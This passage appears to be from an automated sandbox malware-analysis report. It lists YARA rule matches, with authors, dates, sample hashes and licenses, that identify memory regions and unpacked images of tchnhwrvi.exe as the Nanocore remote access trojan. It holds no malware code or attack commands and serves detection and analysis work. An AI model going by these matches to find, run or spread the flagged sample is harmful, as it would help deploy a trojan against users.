      Source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: PhviZrlpkW.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4f14bbe.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.73f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.73f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.73f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.73f0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.43bc350.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43bc350.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.43bc350.26.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.43bc350.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75b0000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.7624c9f.42.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7624c9f.42.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7624c9f.42.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7624c9f.42.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.75e0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75e0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.75e0000.39.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.75e0000.39.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.34111c0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.34111c0.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.34111c0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.34111c0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.7590000.35.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7590000.35.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7590000.35.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7590000.35.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.4f0678e.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.73f0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.73f0000.33.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.73f0000.33.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.73f0000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.7610000.41.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7610000.41.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.7610000.41.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.7610000.41.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.tchnhwrvi.exe.4d32d61.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
